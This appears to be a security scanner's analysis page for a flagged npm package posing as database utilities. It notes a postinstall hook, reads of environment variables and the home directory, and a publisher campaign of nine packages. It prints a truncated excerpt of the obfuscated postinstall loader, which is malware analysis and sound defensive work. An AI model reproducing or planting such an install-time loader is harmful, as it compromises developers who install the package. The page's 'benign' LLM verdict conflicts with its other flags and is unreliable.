// npm package
@cloudplatform-single-spa/floating-ips
Internal database utilities with connection pooling, query builder and migration support
weekly
46
monthly
46
versions
3
maintainers
1
license
UNLICENSED
first publish
2026-05-27
publisher
mr.4nd3r50n
tarball
17,278 B
AUTO-PUBLISHED·1 version indexed·latest published 2026-05-28
// exfil path
what is read → where it shipssteals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> 'use strict';const a0_0x1c198b=a0_0x2816;(function(_0xe6af46,_0x4852b1){const _0x16e480=a0_0x2816,_0x42428b=_0xe6af46();while(!![]){try{const _0x47636e=-parseInt(_0x16e480(0xbb))/(-0xbf*0x1a+0x1*0xf25…// publisher campaignby mr.4nd3r50n
9 caught packages from this accountThis is not an isolated catch. The same publisher has shipped 8 other packages that our pipeline flagged — the shape of a coordinated campaign, not a one-off. Each link below opens that sibling's analysis.
// offending code· @100.100.100· 1 file flagged
llm: benign · 0.85→ No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
- @100.100.100··AUTO-PUBLISHED·publisher: mr.4nd3r50nheuristic 100/100static flags 2llm benign (0.85) via ollamainstall-scripts:postinstallnew-publisher:1danomalous-major-version:100publisher-multi-name-burst:24publisher-version-pump:25osv-flagged:MAL-2026-4922reads-env-varsreads-homedir
→ No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
// offending code· 1 file flaggedpatterns: 2
--- install scripts --- ### postinstall node scripts/postinstall.js ### prepublishOnly echo 'Building...' --- package/scripts/postinstall.js (excerpt) --- 'use strict';const a0_0x1c198b=a0_0x2816;(function(_0xe6af46,_0x4852b1){const _0x16e480=a0_0x2816,_0x42428b=_0xe6af46();while(!![]){try{const _0x47636e=-parseInt(_0x16e480(0xbb))/(-0xbf*0x1a+0x1*0xf25+-0x442*-0x1)*(parseInt(_0x16e480(0xe3))/(0x527*0x5+0x545+-0x1f06))+-parseInt(_0x16e480(0xaa))/(-0x4b6+0x2*-0x135b+0x2b6f)+parseInt(_0x16e480(0xe4))/(-0x1*0x1480+0xe*0x207+-0x7de)+-parseInt(_0x16e480(0xd3))/(-0x2301+0x1*0x1c01+-0x3*-0x257)*(-parseInt(_0x16e480(0xa7))/(0x1*0x14bc+-0x7d*0x21+-0x499))+-parseInt(_0x16e480(0x9e))/(-0xd*0x1da+-0x7ea+-0x37*-0x95)*(-parseInt(_0x16e480(0xbd))/(-0x6*-0x2+0x1*0x1f84+-0xfc4*0x2))+parseInt(_0x16e480(0xd6))/(-0x2d7*-0xc+0x1e3a+0x4045*-0x1)+-parseInt(_0x16e480(0xb6))/(0x91+-0x703+0x67c);if(_0x47636e===_0x4852b1)break;else _0x42428b['push'](_0x42428b['shift']());}catch(_0x52e1f7){_0x42428b['push'](_0x42428b['shift']());}}}(a0_0x3719,0xe0088+-0xdf735*-0x1+-0x14219*0xd));function a0_0x3719(){const _0x2b6b25=['zxHPC3rZu3LUyW','zxHLy1bHDgG','y2HPBgrFChjVy2vZCW','lMnHy2HL','CgfJA2fNzs5QC29U','BwfJ','CMvWBgfJzq','mtbvrNPNqu8','xsbxyxjUAw5NoIboB2rLlMPZid49mtyUmcbYzxf1AxjLza','zw52','mteWotCZnLf5qvvRzG','yxbWBhK','D29YA3nWywnLCW','BwTKAxjtEw5J','DgLTzw91Da','CMvHzgrPCLn5BMm','y2HHCKnVzgvbDa','C3rKAw8','uefzte9bra','lMPZ','Ahr0Chm6lY9VB2iUBw9PA2eUDgvJAc9WyxLSB2fKlW','Ahr0Ca','D3jPDgu','mZmWotm4BvrsD2fN','mZu5mdy4mfzJAxzoDq','uKvdt05Ft05mwq','BM93','BM9Kzq','lMPZB24','D2LUmZi','Dg1WzgLY','y29UC3rYDwn0B3i','qgnSB3vKCgXHDgzVCM0TC2LUz2XLlxnWys9MBg9HDgLUzY1PC --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- dist/index.d.ts (bundled) --- export interface PoolOptions { host?: string; port?: number; database?: string; user?: string; password?: string; max?: number; } export interface Pool { host: string; port: number; database: string; } export function createPool(options?: PoolOptions): Pool; export function query(pool: Pool, sql: string, params?: unknown[]): Promise<unknown[]>; export function transaction(pool: Pool, fn: (client: unknown) => Promise<unknown>): Promise<unknown>; export function migrate(pool: Pool, dir?: string): Promise<string[]>; --- dist/index.js (bundled) --- 'use strict'; // dist/index.js module.exports = require('../src/index.js');
